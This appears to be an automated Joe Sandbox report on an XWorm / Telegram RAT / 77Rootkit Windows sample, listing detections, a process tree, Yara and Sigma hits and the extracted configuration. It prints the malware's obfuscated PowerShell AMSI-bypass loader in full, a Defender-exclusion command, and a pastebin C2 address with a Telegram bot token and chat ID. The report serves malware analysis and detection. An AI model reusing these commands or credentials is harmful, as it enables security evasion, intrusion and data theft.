Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RdLfpZY5A9.exe

Overview

General Information

Sample name:RdLfpZY5A9.exe
renamed because original name is a hash value
Original sample name:b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c.exe
Analysis ID:1575208
MD5:28db4677dcbbaa0a4c5adbc02c9da4f3
SHA1:e1f0199ed131a90e25204399e4e876da64ea3ba5
SHA256:b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c
Tags:exeuser-Chainskilabs
Infos:

Detection

77Rootkit, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected 77Rootkit
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates files in the system32 config directory
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RdLfpZY5A9.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\RdLfpZY5A9.exe" MD5: 28DB4677DCBBAA0A4C5ADBC02C9DA4F3)
    • Install.exe (PID: 7408 cmdline: "C:\ProgramData\Install.exe" MD5: B5F6C9AC3389F5E61B4C750CF950E27C)
    • KrnlSetupSus.exe (PID: 7424 cmdline: "C:\ProgramData\KrnlSetupSus.exe" MD5: 6435792D63BE630506EB9EEBBD1E3878)
      • powershell.exe (PID: 7712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7452 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+'r'+'e'+[Char](115)+'s',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+'c'+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qnwSIaibfbWlFcLLMVH=zDgZeIZuxWRL @([String])([IntPtr]);$MmSYyEqPQkjxSlmVVTEznD=zDgZeIZuxWRL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$saKjRLExuCO=$ysqdxYMCHCLNa.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$lUrimOjxLHSAgu=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$saKjRLExuCO,[Object]('L'+[Char](111)+'ad'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$BgYJLHVZjDSQrMGil=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$saKjRLExuCO,[Object]('V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$kIpEHaJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lUrimOjxLHSAgu,$qnwSIaibfbWlFcLLMVH).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.dll');$rLMnIHfZQPDuCMOEo=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$kIpEHaJ,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+''+'B'+'uf'+[Char](102)+''+[Char](101)+'r')));$MjFQYglbdB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BgYJLHVZjDSQrMGil,$MmSYyEqPQkjxSlmVVTEznD).Invoke($rLMnIHfZQPDuCMOEo,[uint32]8,4,[ref]$MjFQYglbdB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rLMnIHfZQPDuCMOEo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BgYJLHVZjDSQrMGil,$MmSYyEqPQkjxSlmVVTEznD).Invoke($rLMnIHfZQPDuCMOEo,[uint32]8,0x20,[ref]$MjFQYglbdB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 7680 cmdline: C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 372 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 888 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 660 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1224 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1392 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1412 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1596 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1704 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1716 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1740 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1800 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1876 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2012 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2020 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2028 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 960 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2092 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • spoolsv.exe (PID: 2204 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
      • svchost.exe (PID: 2304 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2420 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/Zx6DUkf9"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "driver.exe", "Telegram Token": "6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI", "Telegram Chatid": "5999137434"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\ntoskrnl.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      C:\ProgramData\ntoskrnl.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\ProgramData\ntoskrnl.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\ProgramData\ntoskrnl.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            C:\ProgramData\ntoskrnl.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xff76:$s6: VirtualBox
            • 0xfed4:$s8: Win32_ComputerSystem
            • 0x12cc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x12d5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x12e72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x1178c:$cnc4: POST / HTTP/1.1
            Click to see the 6 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_Rootkit77Yara detected 77RootkitJoe Security
              00000004.00000002.1516696154.000001A854270000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_Rootkit77Yara detected 77RootkitJoe Security
                00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xfd76:$s6: VirtualBox
                    • 0xfcd4:$s8: Win32_ComputerSystem
                    • 0x12ac0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x12b5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x12c72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x1158c:$cnc4: POST / HTTP/1.1
                    Click to see the 14 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    2.2.Install.exe.7c40b0.1.raw.unpackJoeSecurity_Rootkit77Yara detected 77RootkitJoe Security
                      4.2.powershell.exe.1a84bcc81a8.13.unpackJoeSecurity_Rootkit77Yara detected 77RootkitJoe Security
                        4.2.powershell.exe.1a854270000.16.unpackJoeSecurity_Rootkit77Yara detected 77RootkitJoe Security
                          2.2.Install.exe.7c40b0.1.unpackJoeSecurity_Rootkit77Yara detected 77RootkitJoe Security
                            0.2.RdLfpZY5A9.exe.1294ef08.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
                              Click to see the 23 entries

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Potential PowerShell Command Line Obfuscation
                              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'
                              Sigma detected: Potential WinAPI Calls Via CommandLine
                              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+